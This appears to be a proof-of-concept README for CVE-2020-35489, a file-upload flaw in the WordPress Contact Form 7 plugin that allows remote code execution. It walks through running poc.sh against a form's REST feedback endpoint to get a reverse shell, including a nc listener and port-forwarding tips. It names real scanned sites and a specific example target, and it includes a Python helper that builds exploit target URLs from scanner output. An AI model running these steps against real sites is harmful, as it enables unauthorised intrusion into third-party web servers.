
CVE-2020-35489 PoC: WordPress contact-form-7 Code Issue Vulnerability

Associated vulnerability
Title: WordPress contact-form-7 Code Issue Vulnerability (CVE-2020-35489)
Description: The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.

Repository: poc-CVE-2020-35489
# CVE-2020-35489 POC

![sploit](images/poc-CVE-2020-35489-running-sploit.svg)

![shell](images/poc-CVE-2020-35489-revshell.svg)

## About

* https://nvd.nist.gov/vuln/detail/CVE-2020-35489
* https://blog.wpsec.com/contact-form-7-vulnerability/
* https://www.secpod.com/blog/wordpress-plugin-contact-form-7-critical-file-upload-vulnerability-cve-2020-35489/
* https://help.stoik.io/de/cve-2020-35489

## Usage

```bash
bash poc.sh url loc_ip loc_port
```

* `url` is the vulnerable site URL: the form's REST feedback endpoint, not a bare domain (see the next section)
* `loc_ip` is the attacker machine IP that receives the reverse shell
* `loc_port` is the attacker machine port that receives the reverse shell

## What is the vulnerable URL?

The [nuclei](https://github.com/projectdiscovery/nuclei) scanner flags this CVE as critical by reading the plugin version from `readme.txt`, reporting it in the following form (the example sites shown in this doc have since been made immune):

```text
[CVE-2020-35489] [http] [critical] https://ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://majestic.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [4.6]
[CVE-2020-35489] [http] [critical] https://www.ccp.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
[CVE-2020-35489] [http] [critical] https://www.ksmu.org.ru:443/wp-content/plugins/contact-form-7/readme.txt [5.1.7]
```

The scanner does not provide the vulnerable URL, however: a `readme.txt` version match only tells you an affected release is installed. For the exploit to work, you have to do some research and find a form on the detected site that uses the plugin and has a file-upload field, since the bug is in the handling of uploaded files.
For example, let's look at http://itws.ru/?page_id=29

![itws](images/itws.png)

When we submit the form, we can see the URL the request goes to:

![itws](images/itws2.png)

This is what the PoC script takes as its first parameter: `http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback` (the `28` is the Contact Form 7 form ID, not the page ID `29`)

For that site:

```bash
bash poc.sh http://itws.ru/index.php?rest_route=/contact-form-7/v1/contact-forms/28/feedback your_machine_ip your_ip_port
```
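The steps above (version check from `readme.txt`, then locating the form and its REST feedback endpoint) can be scripted. The following is an added triage helper, not code from the PoC repository: it reads the `Stable tag:` line of the plugin's `readme.txt`, scans a page for Contact Form 7 forms, keeps only those with a file-upload field, and prints the feedback URL that `poc.sh` expects as its `url` argument. It assumes the standard Contact Form 7 markup (a `<form>` with class `wpcf7-form` containing a hidden `_wpcf7` input that carries the form ID) and runs offline on constructed sample input; the `itws.ru` base URL is only reused from the walkthrough above.

```python
"""Triage helper for CVE-2020-35489 (added example; not part of the PoC repo).

Given the plugin readme.txt and the HTML of a page that embeds a form, it
(1) reads the Contact Form 7 version from the "Stable tag:" line, the version
    string the readme.txt-based scanner check above reports,
(2) locates every Contact Form 7 form on the page, its form ID and whether
    it has a file-upload field, and
(3) builds the REST feedback URL that poc.sh takes as its first argument.
Assumes the standard CF7 markup (form class "wpcf7-form", hidden input
"_wpcf7" carrying the form ID); the samples below are constructed, not captured.
"""
import re
import sys
import urllib.request
from html.parser import HTMLParser
from typing import List, Optional, Tuple
from urllib.parse import urljoin

FIXED_VERSION = (5, 3, 2)  # first release that sanitizes the uploaded filename
CF7_README_PATH = "wp-content/plugins/contact-form-7/readme.txt"


def parse_version(readme_text: str) -> Optional[Tuple[int, ...]]:
    """Return the version from a WordPress plugin readme's 'Stable tag:' line."""
    m = re.search(r"^Stable tag:\s*([0-9][0-9.]*)", readme_text, re.M | re.I)
    if not m:
        return None  # e.g. "Stable tag: trunk" or no readme at all
    return tuple(int(p) for p in m.group(1).rstrip(".").split("."))


def is_affected(version: Optional[Tuple[int, ...]]) -> bool:
    """True for any version below 5.3.2 (tuple compare handles 5.10 > 5.3)."""
    return version is not None and version < FIXED_VERSION


class CF7FormScanner(HTMLParser):
    """Collects CF7 forms: their ID (_wpcf7) and whether they accept file uploads."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[dict] = []
        self._current: Optional[dict] = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        classes = (a.get("class") or "").split()
        if tag == "form" and "wpcf7-form" in classes:
            self._current = {"id": None, "file_upload": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if a.get("name") == "_wpcf7" and (a.get("value") or "").isdigit():
                self._current["id"] = int(a["value"])
            elif (a.get("type") or "").lower() == "file":
                self._current["file_upload"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def feedback_url(site: str, form_id: int, pretty_permalinks: bool = False) -> str:
    """REST endpoint the form posts to; the PoC takes this as its `url` argument."""
    route = f"/contact-form-7/v1/contact-forms/{form_id}/feedback"
    if pretty_permalinks:
        return urljoin(site, "wp-json" + route)
    return urljoin(site, "index.php?rest_route=" + route)


def triage(site: str, readme_text: str, page_html: str) -> List[str]:
    """Feedback URLs of file-upload forms, only if the plugin version is affected."""
    if not is_affected(parse_version(readme_text)):
        return []
    scanner = CF7FormScanner()
    scanner.feed(page_html)
    return [feedback_url(site, f["id"])
            for f in scanner.forms if f["file_upload"] and f["id"] is not None]


# Constructed sample input (not captured from any real site).
SAMPLE_README = "=== Contact Form 7 ===\nRequires at least: 5.5\nStable tag: 5.1.7\n"
SAMPLE_PAGE = """
<div class="wpcf7" id="wpcf7-f28-p29-o1">
<form action="/?page_id=29#wpcf7-f28-p29-o1" method="post" class="wpcf7-form init">
<input type="hidden" name="_wpcf7" value="28" />
<input type="text" name="your-name" />
<input type="file" name="your-file" class="wpcf7-file" accept=".pdf,.doc" />
<input type="submit" value="Send" class="wpcf7-submit" />
</form></div>
<form class="search-form"><input type="text" name="s" /></form>
<div class="wpcf7" id="wpcf7-f31-p29-o2">
<form method="post" class="wpcf7-form init">
<input type="hidden" name="_wpcf7" value="31" />
<input type="email" name="your-email" />
</form></div>
"""


def fetch(url: str) -> str:
    """Plain GET used only in live mode; the demo below stays offline."""
    return urllib.request.urlopen(url, timeout=15).read().decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) == 3:  # live: python3 cf7_triage.py <site-root/> <page-with-form>
        site, page = sys.argv[1], sys.argv[2]
        print("\n".join(triage(site, fetch(urljoin(site, CF7_README_PATH)), fetch(page))))
    else:  # offline demo on the constructed sample: only form 28 qualifies
        print(triage("http://itws.ru", SAMPLE_README, SAMPLE_PAGE))
```

In live mode pass the site root with a trailing slash (`urljoin` drops a trailing path component otherwise), and use `pretty_permalinks=True` when the site's REST API lives under `/wp-json/` rather than `index.php?rest_route=`; the form's own `action` URL, as seen in the browser, tells you which one to use. Form 31 in the sample is a Contact Form 7 form but has no file field, so it is correctly left out.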

## Reverse shell

If the exploit succeeds, you get a shell connecting back to the specified IP and port.

### Example

Suppose you have a cloud instance for the exploit whose IP is 145.21.32.5. You SSH into the instance and run `nc -l 11244`. From a second SSH session you run `poc.sh`:

```bash
bash poc.sh https://example.com/wp-url 145.21.32.5 11244
```

If the exploit succeeds, `nc` in the first SSH terminal receives a shell on the target machine. Note that it runs as the web server's user (typically `www-data`), not root, because it is spawned by the PHP process that served the upload; getting root requires a separate privilege escalation.

If you test the PoC from **behind a router**, don't forget to **forward the port** on which the reverse-shell listener is waiting.
File Snapshot

```text
[4.0K] /data/pocs/082a7e63b0096996c9591a5e7bfbd72989f0d53c
├── [4.0K] images
│   ├── [ 52K] itws2.png
│   ├── [404K] itws.png
│   ├── [ 13K] poc-CVE-2020-35489-revshell.svg
│   └── [ 47K] poc-CVE-2020-35489-running-sploit.svg
├── [ 39K] payload.pdf
├── [ 587] poc.sh
└── [2.6K] README.md

1 directory, 7 files
```